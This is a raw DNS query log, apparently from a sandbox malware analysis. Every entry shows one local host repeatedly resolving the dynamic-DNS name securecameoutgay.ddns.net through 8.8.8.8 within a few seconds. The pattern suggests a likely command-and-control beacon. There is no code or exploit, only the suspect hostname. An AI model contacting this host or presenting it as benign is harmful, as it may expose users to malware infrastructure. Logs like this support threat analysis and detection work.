                                                    Oct 12, 2024 23:05:13.157702923 CEST192.168.2.148.8.8.80x594aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.166205883 CEST192.168.2.148.8.8.80x594aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.174906015 CEST192.168.2.148.8.8.80x594aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.183801889 CEST192.168.2.148.8.8.80x594aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.193671942 CEST192.168.2.148.8.8.80x901eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.202265024 CEST192.168.2.148.8.8.80x901eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.211008072 CEST192.168.2.148.8.8.80x901eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.219470024 CEST192.168.2.148.8.8.80x901eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.227715969 CEST192.168.2.148.8.8.80x901eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.238485098 CEST192.168.2.148.8.8.80x8504Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.246918917 CEST192.168.2.148.8.8.80x8504Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.255593061 CEST192.168.2.148.8.8.80x8504Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.265834093 CEST192.168.2.148.8.8.80x8504Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.275281906 CEST192.168.2.148.8.8.80x8504Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.285001040 CEST192.168.2.148.8.8.80xa1e6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.293302059 CEST192.168.2.148.8.8.80xa1e6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.301841974 CEST192.168.2.148.8.8.80xa1e6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.309989929 CEST192.168.2.148.8.8.80xa1e6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.318283081 CEST192.168.2.148.8.8.80xa1e6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.327655077 CEST192.168.2.148.8.8.80x354aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.336370945 CEST192.168.2.148.8.8.80x354aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.350106001 CEST192.168.2.148.8.8.80x354aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.361630917 CEST192.168.2.148.8.8.80x354aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.374226093 CEST192.168.2.148.8.8.80x354aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.388289928 CEST192.168.2.148.8.8.80xddcfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.398109913 CEST192.168.2.148.8.8.80xddcfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.406821966 CEST192.168.2.148.8.8.80xddcfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.416143894 CEST192.168.2.148.8.8.80xddcfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.425923109 CEST192.168.2.148.8.8.80xddcfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.437959909 CEST192.168.2.148.8.8.80xbd87Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.447936058 CEST192.168.2.148.8.8.80xbd87Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.458993912 CEST192.168.2.148.8.8.80xbd87Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.585609913 CEST192.168.2.148.8.8.80xbd87Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.597625971 CEST192.168.2.148.8.8.80xbd87Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.611896038 CEST192.168.2.148.8.8.80x4171Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.626848936 CEST192.168.2.148.8.8.80x4171Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.638257980 CEST192.168.2.148.8.8.80x4171Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.648113012 CEST192.168.2.148.8.8.80x4171Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.659224987 CEST192.168.2.148.8.8.80x4171Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.671998978 CEST192.168.2.148.8.8.80xe59eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.683469057 CEST192.168.2.148.8.8.80xe59eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.691941023 CEST192.168.2.148.8.8.80xe59eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.702156067 CEST192.168.2.148.8.8.80xe59eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.712820053 CEST192.168.2.148.8.8.80xe59eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.727930069 CEST192.168.2.148.8.8.80xea6aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.737432003 CEST192.168.2.148.8.8.80xea6aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.747232914 CEST192.168.2.148.8.8.80xea6aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.759026051 CEST192.168.2.148.8.8.80xea6aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.769469023 CEST192.168.2.148.8.8.80xea6aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.782980919 CEST192.168.2.148.8.8.80xefe2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.791850090 CEST192.168.2.148.8.8.80xefe2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.800651073 CEST192.168.2.148.8.8.80xefe2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.809883118 CEST192.168.2.148.8.8.80xefe2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.818523884 CEST192.168.2.148.8.8.80xefe2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.829533100 CEST192.168.2.148.8.8.80x53e0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.838996887 CEST192.168.2.148.8.8.80x53e0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.848545074 CEST192.168.2.148.8.8.80x53e0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.858692884 CEST192.168.2.148.8.8.80x53e0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.869589090 CEST192.168.2.148.8.8.80x53e0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.897591114 CEST192.168.2.148.8.8.80x209bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.910046101 CEST192.168.2.148.8.8.80x209bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.921701908 CEST192.168.2.148.8.8.80x209bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.931262016 CEST192.168.2.148.8.8.80x209bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.941179037 CEST192.168.2.148.8.8.80x209bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.954586029 CEST192.168.2.148.8.8.80xf605Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.964427948 CEST192.168.2.148.8.8.80xf605Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.973630905 CEST192.168.2.148.8.8.80xf605Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.982366085 CEST192.168.2.148.8.8.80xf605Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.992399931 CEST192.168.2.148.8.8.80xf605Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:14.005687952 CEST192.168.2.148.8.8.80x66b6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:14.015459061 CEST192.168.2.148.8.8.80x66b6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:14.024144888 CEST192.168.2.148.8.8.80x66b6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:14.033739090 CEST192.168.2.148.8.8.80x66b6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:14.043735027 CEST192.168.2.148.8.8.80x66b6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:14.056592941 CEST192.168.2.148.8.8.80xf458Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:14.066673994 CEST192.168.2.148.8.8.80xf458Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:14.075983047 CEST192.168.2.148.8.8.80xf458Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:14.085776091 CEST192.168.2.148.8.8.80xf458Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:14.095484018 CEST192.168.2.148.8.8.80xf458Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:14.108688116 CEST192.168.2.148.8.8.80x2c06Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:14.123486042 CEST192.168.2.148.8.8.80x2c06Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:14.131736040 CEST192.168.2.148.8.8.80x2c06Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:14.140935898 CEST192.168.2.148.8.8.80x2c06Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:14.149823904 CEST192.168.2.148.8.8.80x2c06Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:14.161902905 CEST192.168.2.148.8.8.80x8577Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:14.171936035 CEST192.168.2.148.8.8.80x8577Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:14.193099976 CEST192.168.2.148.8.8.80x8577Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:14.208983898 CEST192.168.2.148.8.8.80x8577Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:14.217458963 CEST192.168.2.148.8.8.80x8577Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:14.229242086 CEST192.168.2.148.8.8.80x4d24Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:14.239176989 CEST192.168.2.148.8.8.80x4d24Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:14.248934984 CEST192.168.2.148.8.8.80x4d24Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:14.258785963 CEST192.168.2.148.8.8.80x4d24Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:14.268791914 CEST192.168.2.148.8.8.80x4d24Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:14.281722069 CEST192.168.2.148.8.8.80xb9a6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:14.291786909 CEST192.168.2.148.8.8.80xb9a6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:14.303939104 CEST192.168.2.148.8.8.80xb9a6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:14.314996958 CEST192.168.2.148.8.8.80xb9a6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:14.334985971 CEST192.168.2.148.8.8.80xb9a6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:14.350373983 CEST192.168.2.148.8.8.80x20d6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:14.364738941 CEST192.168.2.148.8.8.80x20d6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:14.375272036 CEST192.168.2.148.8.8.80x20d6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:14.391464949 CEST192.168.2.148.8.8.80x20d6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:14.418311119 CEST192.168.2.148.8.8.80x20d6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:14.449198961 CEST192.168.2.148.8.8.80xf86Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:14.471956968 CEST192.168.2.148.8.8.80xf86Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:14.490036011 CEST192.168.2.148.8.8.80xf86Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:14.502074003 CEST192.168.2.148.8.8.80xf86Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:14.527509928 CEST192.168.2.148.8.8.80xf86Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:14.554316998 CEST192.168.2.148.8.8.80x6cedStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:14.567835093 CEST192.168.2.148.8.8.80x6cedStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:14.580070019 CEST192.168.2.148.8.8.80x6cedStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:14.594942093 CEST192.168.2.148.8.8.80x6cedStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:14.616923094 CEST192.168.2.148.8.8.80x6cedStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:14.644500017 CEST192.168.2.148.8.8.80x42f4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:14.659424067 CEST192.168.2.148.8.8.80x42f4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:14.685348988 CEST192.168.2.148.8.8.80x42f4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:14.698631048 CEST192.168.2.148.8.8.80x42f4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:14.716787100 CEST192.168.2.148.8.8.80x42f4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:14.742321968 CEST192.168.2.148.8.8.80x131bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:14.759170055 CEST192.168.2.148.8.8.80x131bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:14.771853924 CEST192.168.2.148.8.8.80x131bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:14.792133093 CEST192.168.2.148.8.8.80x131bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:14.810123920 CEST192.168.2.148.8.8.80x131bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:14.830568075 CEST192.168.2.148.8.8.80x2cadStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:14.840794086 CEST192.168.2.148.8.8.80x2cadStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:14.849848032 CEST192.168.2.148.8.8.80x2cadStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:14.859203100 CEST192.168.2.148.8.8.80x2cadStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:14.870353937 CEST192.168.2.148.8.8.80x2cadStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:14.883888960 CEST192.168.2.148.8.8.80x38a2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:14.893703938 CEST192.168.2.148.8.8.80x38a2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:14.907129049 CEST192.168.2.148.8.8.80x38a2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:14.918484926 CEST192.168.2.148.8.8.80x38a2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:14.931235075 CEST192.168.2.148.8.8.80x38a2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:14.944689989 CEST192.168.2.148.8.8.80x9882Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:14.953294992 CEST192.168.2.148.8.8.80x9882Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:14.962383986 CEST192.168.2.148.8.8.80x9882Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:14.970983028 CEST192.168.2.148.8.8.80x9882Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:14.980818987 CEST192.168.2.148.8.8.80x9882Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:14.992275000 CEST192.168.2.148.8.8.80x8e0dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.001480103 CEST192.168.2.148.8.8.80x8e0dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.011764050 CEST192.168.2.148.8.8.80x8e0dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.020767927 CEST192.168.2.148.8.8.80x8e0dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.086275101 CEST192.168.2.148.8.8.80x8e0dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.183511019 CEST192.168.2.148.8.8.80xed31Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.195405006 CEST192.168.2.148.8.8.80xed31Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.202898026 CEST192.168.2.148.8.8.80xed31Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.212383986 CEST192.168.2.148.8.8.80xed31Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.224025011 CEST192.168.2.148.8.8.80xed31Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.235728025 CEST192.168.2.148.8.8.80x37acStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.243861914 CEST192.168.2.148.8.8.80x37acStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.255127907 CEST192.168.2.148.8.8.80x37acStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.263747931 CEST192.168.2.148.8.8.80x37acStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.271235943 CEST192.168.2.148.8.8.80x37acStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.280580997 CEST192.168.2.148.8.8.80x10e9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.291265965 CEST192.168.2.148.8.8.80x10e9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.299705982 CEST192.168.2.148.8.8.80x10e9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.311044931 CEST192.168.2.148.8.8.80x10e9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.318923950 CEST192.168.2.148.8.8.80x10e9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.328696966 CEST192.168.2.148.8.8.80x18c6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.339953899 CEST192.168.2.148.8.8.80x18c6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.350893974 CEST192.168.2.148.8.8.80x18c6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.359405994 CEST192.168.2.148.8.8.80x18c6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.368031979 CEST192.168.2.148.8.8.80x18c6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.381509066 CEST192.168.2.148.8.8.80xebb8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.391026020 CEST192.168.2.148.8.8.80xebb8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.399254084 CEST192.168.2.148.8.8.80xebb8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.407682896 CEST192.168.2.148.8.8.80xebb8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.417171001 CEST192.168.2.148.8.8.80xebb8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.428397894 CEST192.168.2.148.8.8.80xaecfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.438885927 CEST192.168.2.148.8.8.80xaecfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.447448969 CEST192.168.2.148.8.8.80xaecfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.457061052 CEST192.168.2.148.8.8.80xaecfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.467135906 CEST192.168.2.148.8.8.80xaecfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.483650923 CEST192.168.2.148.8.8.80xa78dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.491826057 CEST192.168.2.148.8.8.80xa78dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.498749018 CEST192.168.2.148.8.8.80xa78dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.507013083 CEST192.168.2.148.8.8.80xa78dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.514969110 CEST192.168.2.148.8.8.80xa78dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.530751944 CEST192.168.2.148.8.8.80xfd3aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.538249969 CEST192.168.2.148.8.8.80xfd3aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.555107117 CEST192.168.2.148.8.8.80xfd3aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.562971115 CEST192.168.2.148.8.8.80xfd3aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.571937084 CEST192.168.2.148.8.8.80xfd3aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.583889961 CEST192.168.2.148.8.8.80x174bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.594419956 CEST192.168.2.148.8.8.80x174bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.602950096 CEST192.168.2.148.8.8.80x174bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.611027956 CEST192.168.2.148.8.8.80x174bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
